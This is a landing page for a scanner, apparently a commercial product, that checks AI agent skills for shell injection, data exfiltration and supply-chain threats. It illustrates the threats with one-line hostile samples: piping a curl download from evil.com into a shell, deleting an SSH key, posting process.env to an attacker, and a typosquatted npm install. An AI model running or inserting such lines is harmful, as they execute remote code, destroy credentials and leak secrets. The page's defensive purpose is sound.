🛡️ Security Scanner for AI Agent Skills

Is this Skill safe?

Scan any Moltbot Skill for security risks before you install it. Detect shell injection, data exfiltration, and hidden threats.

—
Skills Scanned
3
Detection Engines
30+
Attack Patterns
API
For Agents
THE PROBLEM

AI Agent Skills Are a New Attack Vector

Third-party skills execute with your agent's permissions. Without scanning, you're blindly trusting unknown code.

CRITICAL

Remote Code Execution

Malicious skills use exec(), eval(), or new Function() to run arbitrary commands.

exec('curl evil.com | sh')
HIGH

File System Attacks

Skills can read, overwrite, or delete files—including SSH keys and credentials.

fs.unlinkSync('~/.ssh/id_rsa')
MEDIUM

Data Exfiltration

Network-enabled skills can silently POST API keys and secrets to external servers.

fetch(evil, {body: process.env})
SUPPLY CHAIN

Dependency Attacks

Typosquatting and compromised packages introduce hidden vulnerabilities.

npm install lodahs
TRY IT

Interactive Security Scanner

Paste code or load a preset to see MoltCheck in action.

đź“„ source.js
📊 Output

Click "Run Security Analysis" to scan the code...

CAPABILITIES

What MoltCheck Detects

Three detection engines working together: AST analysis, regex patterns, and dependency scanning.

SeverityPatternRisk
criticalexec(), spawn(), eval()Arbitrary code execution
criticalTyposquatted packagesSupply chain attack
criticalPrompt injectionAgent manipulation
highfs.writeFile, fs.unlinkFile tampering/deletion
highString construction evasionHidden malicious code
mediumfetch(), axios, http.requestData exfiltration
mediumTime bomb patternsDelayed activation
lowprocess.env accessEnvironment exposure

Ready to secure your agent?

Start scanning skills for free. Upgrade for API access and batch scanning.